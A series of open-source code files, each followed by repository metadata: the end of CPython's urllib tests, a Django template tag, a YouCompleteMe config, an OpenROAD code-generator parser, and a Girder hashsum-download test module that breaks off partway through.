"testing %s: '&' not located in proper place in %s" %
(test_type, result))
self.assertEqual(len(result), (5 * 3) + 2, #5 chars per thing and amps
"testing %s: "
"unexpected number of characters: %s != %s" %
(test_type, len(result), (5 * 3) + 2))
def test_using_mapping(self):
# Test passing in a mapping object as an argument.
self.help_inputtype({"1st":'1', "2nd":'2', "3rd":'3'},
"using dict as input type")
def test_using_sequence(self):
# Test passing in a sequence of two-item sequences as an argument.
self.help_inputtype([('1st', '1'), ('2nd', '2'), ('3rd', '3')],
"using sequence of two-item tuples as input")
def test_quoting(self):
# Make sure keys and values are quoted using quote_plus()
given = {"&":"="}
expect = "%s=%s" % (hexescape('&'), hexescape('='))
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
given = {"key name":"A bunch of pluses"}
expect = "key+name=A+bunch+of+pluses"
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
def test_doseq(self):
# Test that passing True for 'doseq' parameter works correctly
given = {'sequence':['1', '2', '3']}
expect = "sequence=%s" % urllib.parse.quote_plus(str(['1', '2', '3']))
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
result = urllib.parse.urlencode(given, True)
for value in given["sequence"]:
expect = "sequence=%s" % value
self.assertIn(expect, result)
self.assertEqual(result.count('&'), 2,
"Expected 2 '&'s, got %s" % result.count('&'))
def test_empty_sequence(self):
self.assertEqual("", urllib.parse.urlencode({}))
self.assertEqual("", urllib.parse.urlencode([]))
def test_nonstring_values(self):
self.assertEqual("a=1", urllib.parse.urlencode({"a": 1}))
self.assertEqual("a=None", urllib.parse.urlencode({"a": None}))
def test_nonstring_seq_values(self):
self.assertEqual("a=1&a=2", urllib.parse.urlencode({"a": [1, 2]}, True))
self.assertEqual("a=None&a=a",
urllib.parse.urlencode({"a": [None, "a"]}, True))
data = collections.OrderedDict([("a", 1), ("b", 1)])
self.assertEqual("a=a&a=b",
urllib.parse.urlencode({"a": data}, True))
def test_urlencode_encoding(self):
        # ASCII encoding. Expect %3F with errors="replace"
given = (('\u00a0', '\u00c1'),)
expect = '%3F=%3F'
result = urllib.parse.urlencode(given, encoding="ASCII", errors="replace")
self.assertEqual(expect, result)
# Default is UTF-8 encoding.
given = (('\u00a0', '\u00c1'),)
expect = '%C2%A0=%C3%81'
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
# Latin-1 encoding.
given = (('\u00a0', '\u00c1'),)
expect = '%A0=%C1'
result = urllib.parse.urlencode(given, encoding="latin-1")
self.assertEqual(expect, result)
def test_urlencode_encoding_doseq(self):
        # ASCII Encoding. Expect %3F with errors="replace"
given = (('\u00a0', '\u00c1'),)
expect = '%3F=%3F'
result = urllib.parse.urlencode(given, doseq=True,
encoding="ASCII", errors="replace")
self.assertEqual(expect, result)
# ASCII Encoding. On a sequence of values.
given = (("\u00a0", (1, "\u00c1")),)
expect = '%3F=1&%3F=%3F'
result = urllib.parse.urlencode(given, True,
encoding="ASCII", errors="replace")
self.assertEqual(expect, result)
# Utf-8
given = (("\u00a0", "\u00c1"),)
expect = '%C2%A0=%C3%81'
result = urllib.parse.urlencode(given, True)
self.assertEqual(expect, result)
given = (("\u00a0", (42, "\u00c1")),)
expect = '%C2%A0=42&%C2%A0=%C3%81'
result = urllib.parse.urlencode(given, True)
self.assertEqual(expect, result)
# latin-1
given = (("\u00a0", "\u00c1"),)
expect = '%A0=%C1'
result = urllib.parse.urlencode(given, True, encoding="latin-1")
self.assertEqual(expect, result)
given = (("\u00a0", (42, "\u00c1")),)
expect = '%A0=42&%A0=%C1'
result = urllib.parse.urlencode(given, True, encoding="latin-1")
self.assertEqual(expect, result)
def test_urlencode_bytes(self):
given = ((b'\xa0\x24', b'\xc1\x24'),)
expect = '%A0%24=%C1%24'
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
result = urllib.parse.urlencode(given, True)
self.assertEqual(expect, result)
# Sequence of values
given = ((b'\xa0\x24', (42, b'\xc1\x24')),)
expect = '%A0%24=42&%A0%24=%C1%24'
result = urllib.parse.urlencode(given, True)
self.assertEqual(expect, result)
def test_urlencode_encoding_safe_parameter(self):
# Send '$' (\x24) as safe character
# Default utf-8 encoding
given = ((b'\xa0\x24', b'\xc1\x24'),)
result = urllib.parse.urlencode(given, safe=":$")
expect = '%A0$=%C1$'
self.assertEqual(expect, result)
given = ((b'\xa0\x24', b'\xc1\x24'),)
result = urllib.parse.urlencode(given, doseq=True, safe=":$")
expect = '%A0$=%C1$'
self.assertEqual(expect, result)
# Safe parameter in sequence
given = ((b'\xa0\x24', (b'\xc1\x24', 0xd, 42)),)
expect = '%A0$=%C1$&%A0$=13&%A0$=42'
result = urllib.parse.urlencode(given, True, safe=":$")
self.assertEqual(expect, result)
# Test all above in latin-1 encoding
given = ((b'\xa0\x24', b'\xc1\x24'),)
result = urllib.parse.urlencode(given, safe=":$",
encoding="latin-1")
expect = '%A0$=%C1$'
self.assertEqual(expect, result)
given = ((b'\xa0\x24', b'\xc1\x24'),)
expect = '%A0$=%C1$'
result = urllib.parse.urlencode(given, doseq=True, safe=":$",
encoding="latin-1")
given = ((b'\xa0\x24', (b'\xc1\x24', 0xd, 42)),)
expect = '%A0$=%C1$&%A0$=13&%A0$=42'
result = urllib.parse.urlencode(given, True, safe=":$",
encoding="latin-1")
self.assertEqual(expect, result)
class Pathname_Tests(unittest.TestCase):
"""Test pathname2url() and url2pathname()"""
def test_basic(self):
# Make sure simple tests pass
expected_path = os.path.join("parts", "of", "a", "path")
expected_url = "parts/of/a/path"
result = urllib.request.pathname2url(expected_path)
self.assertEqual(expected_url, result,
"pathname2url() failed; %s != %s" %
(result, expected_url))
result = urllib.request.url2pathname(expected_url)
self.assertEqual(expected_path, result,
"url2pathame() failed; %s != %s" %
(result, expected_path))
def test_quoting(self):
# Test that automatic quoting and unquoting work for pathname2url() and
# url2pathname() respectively
given = os.path.join("needs", "quot=ing", "here")
expect = "needs/%s/here" % urllib.parse.quote("quot=ing")
result = urllib.request.pathname2url(given)
self.assertEqual(expect, result,
"pathname2url() failed; %s != %s" %
(expect, result))
expect = given
result = urllib.request.url2pathname(result)
self.assertEqual(expect, result,
"url2pathname() failed; %s != %s" %
(expect, result))
given = os.path.join("make sure", "using_quote")
expect = "%s/using_quote" % urllib.parse.quote("make sure")
result = urllib.request.pathname2url(given)
self.assertEqual(expect, result,
"pathname2url() failed; %s != %s" %
(expect, result))
given = "make+sure/using_unquote"
expect = os.path.join("make+sure", "using_unquote")
result = urllib.request.url2pathname(given)
self.assertEqual(expect, result,
"url2pathname() failed; %s != %s" %
(expect, result))
@unittest.skipUnless(sys.platform == 'win32' or sys.platform == 'uwp',
'test specific to the urllib.request.url2pathname function.')
def test_ntpath(self):
given = ('/C:/', '///C:/', '/C|//')
expect = 'C:\\'
for url in given:
result = urllib.request.url2pathname(url)
self.assertEqual(expect, result,
'urllib.request.url2pathname() failed; %s != %s' %
(expect, result))
given = '///C|/path'
expect = 'C:\\path'
result = urllib.request.url2pathname(given)
self.assertEqual(expect, result,
'urllib.request.url2pathname() failed; %s != %s' %
(expect, result))
class Utility_Tests(unittest.TestCase):
"""Testcase to test the various utility functions in the urllib."""
def test_thishost(self):
"""Test the urllib.request.thishost utility function returns a tuple"""
self.assertIsInstance(urllib.request.thishost(), tuple)
class URLopener_Tests(unittest.TestCase):
"""Testcase to test the open method of URLopener class."""
def test_quoted_open(self):
class DummyURLopener(urllib.request.URLopener):
def open_spam(self, url):
return url
with support.check_warnings(
('DummyURLopener style of invoking requests is deprecated.',
DeprecationWarning)):
self.assertEqual(DummyURLopener().open(
'spam://example/ /'),'//example/%20/')
# test the safe characters are not quoted by urlopen
self.assertEqual(DummyURLopener().open(
"spam://c:|windows%/:=&?~#+!$,;'@()*[]|/path/"),
"//c:|windows%/:=&?~#+!$,;'@()*[]|/path/")
# Just commented them out.
# Can't really tell why they keep failing on Windows and SPARC.
# Everywhere else they work ok, but on those machines they sometimes
# fail in one of the tests, sometimes in another. I have a Linux box, and
# the tests pass there.
# If anybody has one of the problematic environments, please help!
# . Facundo
#
# def server(evt):
# import socket, time
# serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# serv.settimeout(3)
# serv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# serv.bind(("", 9093))
# serv.listen()
# try:
# conn, addr = serv.accept()
# conn.send("1 Hola mundo\n")
# cantdata = 0
# while cantdata < 13:
# data = conn.recv(13-cantdata)
# cantdata += len(data)
# time.sleep(.3)
# conn.send("2 No more lines\n")
# conn.close()
# except socket.timeout:
# pass
# finally:
# serv.close()
# evt.set()
#
# class FTPWrapperTests(unittest.TestCase):
#
# def setUp(self):
# import ftplib, time, threading
# ftplib.FTP.port = 9093
# self.evt = threading.Event()
# threading.Thread(target=server, args=(self.evt,)).start()
# time.sleep(.1)
#
# def tearDown(self):
# self.evt.wait()
#
# def testBasic(self):
# # connects
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# ftp.close()
#
# def testTimeoutNone(self):
# # global default timeout is ignored
# import socket
# self.assertIsNone(socket.getdefaulttimeout())
# socket.setdefaulttimeout(30)
# try:
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# finally:
# socket.setdefaulttimeout(None)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
#
# def testTimeoutDefault(self):
# # global default timeout is used
# import socket
# self.assertIsNone(socket.getdefaulttimeout())
# socket.setdefaulttimeout(30)
# try:
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# finally:
# socket.setdefaulttimeout(None)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
#
# def testTimeoutValue(self):
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [],
# timeout=30)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
class RequestTests(unittest.TestCase):
"""Unit tests for urllib.request.Request."""
def test_default_values(self):
Request = urllib.request.Request
request = Request("http://www.python.org")
self.assertEqual(request.get_method(), 'GET')
request = Request("http://www.python.org", {})
self.assertEqual(request.get_method(), 'POST')
def test_with_method_arg(self):
Request = urllib.request.Request
request = Request("http://www.python.org", method='HEAD')
self.assertEqual(request.method, 'HEAD')
self.assertEqual(request.get_method(), 'HEAD')
request = Request("http://www.python.org", {}, method='HEAD')
self.assertEqual(request.method, 'HEAD')
self.assertEqual(request.get_method(), 'HEAD')
request = Request("http://www.python.org", method='GET')
self.assertEqual(request.get_method(), 'GET')
request.method = 'HEAD'
self.assertEqual(request.get_method(), 'HEAD')
class URL2PathNameTests(unittest.TestCase):
def test_converting_drive_letter(self):
self.assertEqual(url2pathname("///C|"), 'C:')
self.assertEqual(url2pathname("///C:"), 'C:')
self.assertEqual(url2pathname("///C|/"), 'C:\\')
def test_converting_when_no_drive_letter(self):
# cannot end a raw string in \
self.assertEqual(url2pathname("///C/test/"), r'\\\C\test' '\\')
self.assertEqual(url2pathname("////C/test/"), r'\\C\test' '\\')
def test_simple_compare(self):
self.assertEqual(url2pathname("///C|/foo/bar/spam.foo"),
r'C:\foo\bar\spam.foo')
def test_non_ascii_drive_letter(self):
self.assertRaises(IOError, url2pathname, "///\u00e8|/")
def test_roundtrip_url2pathname(self):
list_of_paths = ['C:',
r'\\\C\test\\',
r'C:\foo\bar\spam.foo'
]
for path in list_of_paths:
self.assertEqual(url2pathname(pathname2url(path)), path)
class PathName2URLTests(unittest.TestCase):
def test_converting_drive_letter(self):
self.assertEqual(pathname2url("C:"), '///C:')
self.assertEqual(pathname2url("C:\\"), '///C:')
def test_converting_when_no_drive_letter(self):
self.assertEqual(pathname2url(r"\\\folder\test" "\\"),
'/////folder/test/')
self.assertEqual(pathname2url(r"\\folder\test" "\\"),
'////folder/test/')
self.assertEqual(pathname2url(r"\folder\test" "\\"),
'/folder/test/')
def test_simple_compare(self):
self.assertEqual(pathname2url(r'C:\foo\bar\spam.foo'),
"///C:/foo/bar/spam.foo" )
def test_long_drive_letter(self):
self.assertRaises(IOError, pathname2url, "XX:\\")
def test_roundtrip_pathname2url(self):
list_of_paths = ['///C:',
'/////folder/test/',
'///C:/foo/bar/spam.foo']
for path in list_of_paths:
self.assertEqual(pathname2url(url2pathname(path)), path)
if __name__ == '__main__':
unittest.main()
| {
"content_hash": "e8bfc066902919e7af9614b6212d158b",
"timestamp": "",
"source": "github",
"line_count": 1483,
"max_line_length": 108,
"avg_line_length": 40.49359406608227,
"alnum_prop": 0.5702058216212615,
"repo_name": "ms-iot/python",
"id": "28fe21be817275616bca2f1e9672a119fb400e1f",
"size": "60052",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "cpython/Lib/test/test_urllib.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Assembly",
"bytes": "481852"
},
{
"name": "Batchfile",
"bytes": "35616"
},
{
"name": "C",
"bytes": "15555469"
},
{
"name": "C#",
"bytes": "1231"
},
{
"name": "C++",
"bytes": "726292"
},
{
"name": "CSS",
"bytes": "2839"
},
{
"name": "Common Lisp",
"bytes": "24481"
},
{
"name": "DIGITAL Command Language",
"bytes": "26402"
},
{
"name": "HTML",
"bytes": "130698"
},
{
"name": "JavaScript",
"bytes": "10616"
},
{
"name": "M4",
"bytes": "223087"
},
{
"name": "Makefile",
"bytes": "197108"
},
{
"name": "Objective-C",
"bytes": "2098686"
},
{
"name": "PLSQL",
"bytes": "22886"
},
{
"name": "PostScript",
"bytes": "13803"
},
{
"name": "PowerShell",
"bytes": "1372"
},
{
"name": "Python",
"bytes": "24948876"
},
{
"name": "Roff",
"bytes": "254942"
},
{
"name": "Shell",
"bytes": "437386"
},
{
"name": "TeX",
"bytes": "323102"
},
{
"name": "Visual Basic",
"bytes": "481"
}
],
"symlink_target": ""
} |
from django import template
from django.urls import reverse
from blargg.models import Entry
register = template.Library()
@register.simple_tag
def entry_archive_year_url():
"""Renders the ``entry_archive_year`` URL for the latest ``Entry``."""
entry = Entry.objects.filter(published=True).latest()
arg_list = [entry.published_on.strftime("%Y")]
return reverse('blargg:entry_archive_year', args=arg_list)
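# Usage sketch (not part of the original module): a minimal, assumed example
# of calling this simple_tag from a Django template once the tag library is
# loaded; the surrounding template markup is hypothetical.
#
#     {% load blargg_tags %}
#     <a href="{% entry_archive_year_url %}">Latest year's archive</a>
#
# Note: Entry.objects.latest() with no arguments relies on `get_latest_by`
# being set in the Entry model's Meta, and raises Entry.DoesNotExist when no
# published entries exist.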
| {
"content_hash": "5cf2c8b1b7f6eee87c74fa6093937422",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 74,
"avg_line_length": 32.53846153846154,
"alnum_prop": 0.723404255319149,
"repo_name": "bradmontgomery/django-blargg",
"id": "e1f471b26c5ad9c6957df5d6479fda14213e3b11",
"size": "423",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "blargg/templatetags/blargg_tags.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "5238"
},
{
"name": "Python",
"bytes": "45518"
}
],
"symlink_target": ""
} |
import os
import ycm_core
# These are the compilation flags that will be used in case there's no
# compilation database set (by default, one is not set).
# CHANGE THIS LIST OF FLAGS. YES, THIS IS THE DROID YOU HAVE BEEN LOOKING FOR.
flags = [
'-Wall',
#'-Wextra',
'-Werror',
#'-Wc++98-compat',
'-Wno-long-long',
'-Wno-variadic-macros',
'-fexceptions',
# THIS IS IMPORTANT! Without a "-std=<something>" flag, clang won't know which
# language to use when compiling headers. So it will guess. Badly. So C++
# headers will be compiled as C headers. You don't want that so ALWAYS specify
# a "-std=<something>".
# For a C project, you would set this to something like 'c99' instead of
# 'c++11'.
'-std=c++11',
# ...and the same thing goes for the magic -x option which specifies the
# language that the files to be compiled are written in. This is mostly
# relevant for c++ headers.
# For a C project, you would set this to 'c' instead of 'c++'.
'-x',
'c++',
# You can add the specified directory to the search path for
# system include files.
'-isystem', '/usr/lib/clang/3.8.0/include/',
'-isystem', '/opt/include',
'-I', '/opt/include',
# You can add the specified directory to the search path for
# include files.
#'-I',
#'/usr/include/gmock',
'-I',
'/home/ialbrekh/Projects/polivalka/polivalka/src/',
]
# Set this to the absolute path to the folder (NOT the file!) containing the
# compile_commands.json file to use that instead of 'flags'. See here for
# more details: http://clang.llvm.org/docs/JSONCompilationDatabase.html
#
# You can get CMake to generate this file for you by adding:
# set( CMAKE_EXPORT_COMPILE_COMMANDS 1 )
# to your CMakeLists.txt file.
#
# Most projects will NOT need to set this to anything; you can just change the
# 'flags' list of compilation flags. Notice that YCM itself uses that approach.
compilation_database_folder = ''
if os.path.exists( compilation_database_folder ):
database = ycm_core.CompilationDatabase( compilation_database_folder )
else:
database = None
SOURCE_EXTENSIONS = [ '.cpp', '.cxx', '.cc', '.c', '.m', '.mm' ]
def DirectoryOfThisScript():
return os.path.dirname( os.path.abspath( __file__ ) )
def MakeRelativePathsInFlagsAbsolute( flags, working_directory ):
if not working_directory:
return list( flags )
new_flags = []
make_next_absolute = False
path_flags = [ '-isystem', '-I', '-iquote', '--sysroot=' ]
for flag in flags:
new_flag = flag
if make_next_absolute:
make_next_absolute = False
if not flag.startswith( '/' ):
new_flag = os.path.join( working_directory, flag )
for path_flag in path_flags:
if flag == path_flag:
make_next_absolute = True
break
if flag.startswith( path_flag ):
path = flag[ len( path_flag ): ]
new_flag = path_flag + os.path.join( working_directory, path )
break
if new_flag:
new_flags.append( new_flag )
return new_flags
def IsHeaderFile( filename ):
extension = os.path.splitext( filename )[ 1 ]
return extension in [ '.h', '.hxx', '.hpp', '.hh' ]
def GetCompilationInfoForFile( filename ):
# The compilation_commands.json file generated by CMake does not have entries
# for header files. So we do our best by asking the db for flags for a
# corresponding source file, if any. If one exists, the flags for that file
# should be good enough.
if IsHeaderFile( filename ):
basename = os.path.splitext( filename )[ 0 ]
for extension in SOURCE_EXTENSIONS:
replacement_file = basename + extension
if os.path.exists( replacement_file ):
compilation_info = database.GetCompilationInfoForFile(
replacement_file )
if compilation_info.compiler_flags_:
return compilation_info
return None
return database.GetCompilationInfoForFile( filename )
def FlagsForFile( filename, **kwargs ):
if database:
# Bear in mind that compilation_info.compiler_flags_ does NOT return a
# python list, but a "list-like" StringVec object
compilation_info = GetCompilationInfoForFile( filename )
if not compilation_info:
return None
final_flags = MakeRelativePathsInFlagsAbsolute(
compilation_info.compiler_flags_,
compilation_info.compiler_working_dir_ )
# NOTE: This is just for YouCompleteMe; it's highly likely that your project
# does NOT need to remove the stdlib flag. DO NOT USE THIS IN YOUR
# ycm_extra_conf IF YOU'RE NOT 100% SURE YOU NEED IT.
try:
final_flags.remove( '-stdlib=libc++' )
except ValueError:
pass
else:
relative_to = DirectoryOfThisScript()
final_flags = MakeRelativePathsInFlagsAbsolute( flags, relative_to )
return {
'flags': final_flags,
'do_cache': True
}
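# Note (illustrative): YouCompleteMe imports this module and calls
# FlagsForFile(<absolute path>) once per translation unit. With no
# compilation database configured above, a call such as
# FlagsForFile('/home/user/project/src/main.cpp')   # hypothetical path
# simply returns {'flags': <the hard-coded list made absolute>, 'do_cache': True}.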
| {
"content_hash": "a71ed045bab22833252b01336b722d2b",
"timestamp": "",
"source": "github",
"line_count": 144,
"max_line_length": 80,
"avg_line_length": 32.96527777777778,
"alnum_prop": 0.6854855698335791,
"repo_name": "elalfer/IoT-Cronus",
"id": "03931f0959ef87db1fd65590911dc8581a3a8ed9",
"size": "6147",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/.ycm_extra_conf.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C++",
"bytes": "30333"
},
{
"name": "Makefile",
"bytes": "1326"
},
{
"name": "Python",
"bytes": "6147"
},
{
"name": "Shell",
"bytes": "303"
}
],
"symlink_target": ""
} |
import re
def _findIndex(_list, _object, startIndex=0):
index = startIndex
while index < len(_list):
line = _list[index].strip()
line = line.replace(' ', '')
if line == _object:
return index
index += 1
return -1
def _getSections(lines, tag, sections=None, remove=False):
if sections is None:
sections = {}
i = 0
while i < len(lines):
line = lines[i].strip()
line = line.replace(' ', '')
if re.match(tag, line):
name = line[len(tag):]
if name in sections:
raise Exception("Duplicate Tag: {}".format(name))
end = _findIndex(lines, line.replace('Begin', 'End', 1), i)
if end == -1:
print('Could not find an End for tag {}\n'.format(name))
return False
if remove:
del lines[i+1:end]
else:
sections.setdefault(name, [])
if end > i+1:
sections[name].extend(lines[i+1:end])
i += 1
return True
class Parser:
def __init__(self, fileName):
with open(fileName, 'r') as file:
self.lines = file.readlines()
self.generatorCode = {}
self.userCodeTag = '//UserCodeBegin'
self.generatorCodeTag = '//GeneratorCodeBegin'
def setCommentStr(self, comment):
self.userCodeTag = '{}UserCodeBegin'.format(comment)
self.generatorCodeTag = '{}GeneratorCodeBegin'.format(comment)
def parseUserCode(self):
self.userCode = {}
status = _getSections(self.lines, self.userCodeTag, self.userCode)
return status
def parseSourceCode(self, fileName):
with open(fileName, 'r') as sourceFile:
db_lines = sourceFile.readlines()
status = _getSections(db_lines, self.generatorCodeTag,
self.generatorCode)
return status
def cleanCode(self):
status = _getSections(self.lines, self.generatorCodeTag, remove=True)
return status
def writeInFile(self, fileName):
for section in self.generatorCode:
db_lines = self.generatorCode[section]
j = 0
while j < len(db_lines):
line = db_lines[j].strip().replace(' ', '')
if re.match(self.userCodeTag, line):
name = line[len(self.userCodeTag):]
if name in self.userCode:
db_lines[j+1:j+1] = self.userCode[name]
j += 1
self.generatorCode[section] = db_lines
i = 0
while i < len(self.lines):
line = self.lines[i].strip()
line = line.replace(' ', '')
if re.match(self.generatorCodeTag, line):
name = line[len(self.generatorCodeTag):]
self.generatorCode.setdefault(name, [])
self.lines[i+1:i+1] = self.generatorCode[name]
i += 1
with open(fileName, 'w') as out:
out.write(''.join(self.lines))
return True
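# Usage sketch (illustrative only; file names are hypothetical). The flow
# implied by the methods above: capture hand-written "UserCode" sections from
# an existing generated file, pull fresh "GeneratorCode" sections from a new
# source file, drop the stale generated sections, and write the merged result.
#
#     parser = Parser("odb_generated.h")          # file containing the tags
#     parser.setCommentStr("//")                  # tags use C++-style comments
#     if (parser.parseUserCode()
#             and parser.parseSourceCode("odb_new.h")
#             and parser.cleanCode()):
#         parser.writeInFile("odb_generated.h")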
| {
"content_hash": "d339c26fb98979a439962690cd55dc82",
"timestamp": "",
"source": "github",
"line_count": 94,
"max_line_length": 77,
"avg_line_length": 33.03191489361702,
"alnum_prop": 0.52914653784219,
"repo_name": "The-OpenROAD-Project/OpenROAD",
"id": "74f047ca67dd2e3e2070e151c44f9962c60703eb",
"size": "3105",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "src/odb/src/codeGenerator/parser.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "679482"
},
{
"name": "C++",
"bytes": "18429342"
},
{
"name": "CMake",
"bytes": "148596"
},
{
"name": "Cuda",
"bytes": "7441"
},
{
"name": "Dockerfile",
"bytes": "3754"
},
{
"name": "Python",
"bytes": "245126"
},
{
"name": "Ruby",
"bytes": "498"
},
{
"name": "SWIG",
"bytes": "314266"
},
{
"name": "Shell",
"bytes": "39400"
},
{
"name": "Tcl",
"bytes": "1767673"
},
{
"name": "Verilog",
"bytes": "51524137"
},
{
"name": "Yacc",
"bytes": "496743"
}
],
"symlink_target": ""
} |
import hashlib
import six
import time
from girder.exceptions import ValidationException
from girder.models.file import File
from girder.models.folder import Folder
from girder.models.setting import Setting
from girder.models.upload import Upload
from girder.models.user import User
from tests import base
import girder_hashsum_download as hashsum_download
def setUpModule():
base.enabledPlugins.append('hashsum_download')
base.startServer()
def tearDownModule():
base.stopServer()
class HashsumDownloadTest(base.TestCase):
def setUp(self):
base.TestCase.setUp(self, assetstoreType='filesystem')
# Two users are created (user and otherUser).
# A hierarchy is created as is:
# - user:
# |- [Folder (public)] publicFolder:
# |- publicFile
# |- duplicatePublicFile
# |- [Folder (private)] private:
# |- privateFile
# |- privateOnlyFile
#
# - otherUser:
# |- (nothing)
#
# In summary, user has access to all the files and otherUser to none.
self.user = User().createUser(
login='leeloo',
password='multipass',
firstName='Leeloominai',
lastName='Sebat',
email='quinque@universe.org'
)
for folder in Folder().childFolders(parent=self.user, parentType='user', user=self.user):
if folder['public'] is True:
self.publicFolder = folder
else:
self.privateFolder = folder
self.userData = u'\u266a Il dolce suono mi ' \
u'colp\u00ec di sua voce! \u266a'.encode('utf8')
self.privateFile = Upload().uploadFromFile(
obj=six.BytesIO(self.userData),
size=len(self.userData),
name='Il dolce suono - PRIVATE',
parentType='folder',
parent=self.privateFolder,
user=self.user,
mimeType='audio/mp4'
)
self.publicFile = Upload().uploadFromFile(
obj=six.BytesIO(self.userData),
size=len(self.userData),
name='Il dolce suono - PUBLIC',
parentType='folder',
parent=self.publicFolder,
user=self.user,
mimeType='audio/flac'
)
self.duplicatePublicFile = Upload().uploadFromFile(
obj=six.BytesIO(self.userData),
size=len(self.userData),
name='Il dolce suono - PUBLIC DUPLICATE',
parentType='folder',
parent=self.publicFolder,
user=self.user,
mimeType='audio/mp3'
)
self.privateOnlyData =\
u'\u2641 \u2600 \u2601 \u2614 \u2665'.encode('utf8')
self.privateOnlyFile = Upload().uploadFromFile(
obj=six.BytesIO(self.privateOnlyData),
size=len(self.privateOnlyData),
name='Powers combined',
parentType='folder',
parent=self.privateFolder,
user=self.user,
mimeType='image/png'
)
self.otherUser = User().createUser(
login='zorg',
password='mortis',
firstName='Jean-Baptiste',
lastName='Zorg',
email='nullus@universe.org'
)
@staticmethod
def _hashSum(value, algorithm):
hasher = hashlib.new(algorithm)
hasher.update(value)
return hasher.hexdigest()
def _download(self, hashValue, hashAlgorithm,
user=None, params=None, additionalHeaders=None):
return self.request(
path='/file/hashsum/%s/%s/download' % (hashAlgorithm, hashValue),
method='GET',
user=user,
params=params,
additionalHeaders=additionalHeaders,
isJson=False
)
def _testNormalUse(self, hashValue, hashAlgorithm, file, data, user=None):
resp = self._download(hashValue, hashAlgorithm, user=user)
self.assertStatusOk(resp)
self.assertEqual(resp.headers['Accept-Ranges'], 'bytes')
self.assertEqual(resp.headers['Content-Length'], file['size'])
self.assertEqual(resp.headers['Content-Type'], file['mimeType'])
self.assertEqual(resp.headers['Content-Disposition'],
'attachment; filename="%s"' % file['name'])
self.assertEqual(resp.headers['Content-Type'], file['mimeType'])
self.assertEqual(data, self.getBody(resp, text=False))
def testDownload(self):
# Test an invalid algorithm
resp = self._download('1a2b3c4d', 'crc32', user=self.user)
self.assertStatus(resp, 400)
for hashAlgorithm in ['sha512']:
publicDataHash = self._hashSum(self.userData, hashAlgorithm)
privateDataHash = self._hashSum(self.privateOnlyData, hashAlgorithm)
# Test normal use
for hashValue in [publicDataHash.lower(), publicDataHash.upper()]:
for algo in [hashAlgorithm.lower(), hashAlgorithm.upper()]:
self._testNormalUse(
hashValue, algo, self.publicFile, self.userData
)
# Test a non-existent file (in this case, one that's empty)
empty_hash = self._hashSum(b'', hashAlgorithm)
resp = self._download(empty_hash, hashAlgorithm)
self.assertStatus(resp, 404)
# Test a private file anonymously
resp = self._download(privateDataHash, hashAlgorithm)
self.assertStatus(resp, 404)
# Test a private file when unauthorized
resp = self._download(
privateDataHash, hashAlgorithm, user=self.otherUser
)
self.assertStatus(resp, 404)
# Test a private file when authorized
resp = self._download(
privateDataHash, hashAlgorithm, user=self.user
)
self.assertStatusOk(resp)
self.assertEqual(
self.privateOnlyData, self.getBody(resp, text=False))
# Test for a file that exists in both public and private folder
# while logged in.
self._testNormalUse(
publicDataHash,
hashAlgorithm,
self.privateFile,
self.userData,
user=self.user
)
# Test specified content dispositions
for contentDisposition in ['attachment', 'inline']:
disposition = {
'contentDisposition': contentDisposition
}
resp = self._download(
publicDataHash, hashAlgorithm, params=disposition
)
self.assertStatusOk(resp)
self.assertEqual(resp.headers['Content-Disposition'],
'%s; filename="%s"' %
(contentDisposition, self.publicFile['name']))
self.assertEqual(self.userData,
self.getBody(resp, text=False))
# Test downloading with an offset
resp = self._download(
publicDataHash, hashAlgorithm, params={'offset': 15})
self.assertStatus(resp, 206)
self.assertEqual(self.userData[15:],
self.getBody(resp, text=False))
# Test downloading with a range header and query range params
respHeader = self._download(
publicDataHash, hashAlgorithm,
additionalHeaders=[('Range', 'bytes=10-29')]
)
respQuery = self._download(
publicDataHash, hashAlgorithm,
params={'offset': 10, 'endByte': 30}
)
for resp in [respHeader, respQuery]:
self.assertStatus(resp, 206)
self.assertEqual(resp.headers['Accept-Ranges'], 'bytes')
self.assertEqual(resp.headers['Content-Length'], 30 - 10)
self.assertEqual(resp.headers['Content-Range'],
'bytes 10-29/%d' % len(self.userData))
self.assertEqual(resp.headers['Content-Type'],
self.publicFile['mimeType'])
self.assertEqual(self.userData[10:30],
self.getBody(resp, text=False))
def testKeyFile(self):
# Make sure sha512 appears in returned file documents
resp = self.request('/file/%s' % self.publicFile['_id'])
self.assertStatusOk(resp)
self.assertEqual(resp.json['sha512'], self.publicFile['sha512'])
template = '/file/%s/hashsum_file/%s'
# Test with bad algo
resp = self.request(template % (self.publicFile['_id'], 'foo'))
self.assertStatus(resp, 400)
six.assertRegex(self, resp.json['message'], '^Invalid value for algo: "foo"')
# Should work with public file
resp = self.request(template % (self.publicFile['_id'], 'sha512'),
isJson=False)
self.assertStatusOk(resp)
respBody = self.getBody(resp)
self.assertEqual(respBody, '%s\n' % self.publicFile['sha512'])
self.assertEqual(len(respBody), 129)
# Should not work with private file
resp = self.request(template % (self.privateFile['_id'], 'sha512'))
self.assertStatus(resp, 401)
six.assertRegex(self, resp.json['message'], '^Read access denied')
def testAutoComputeHashes(self):
with self.assertRaises(ValidationException):
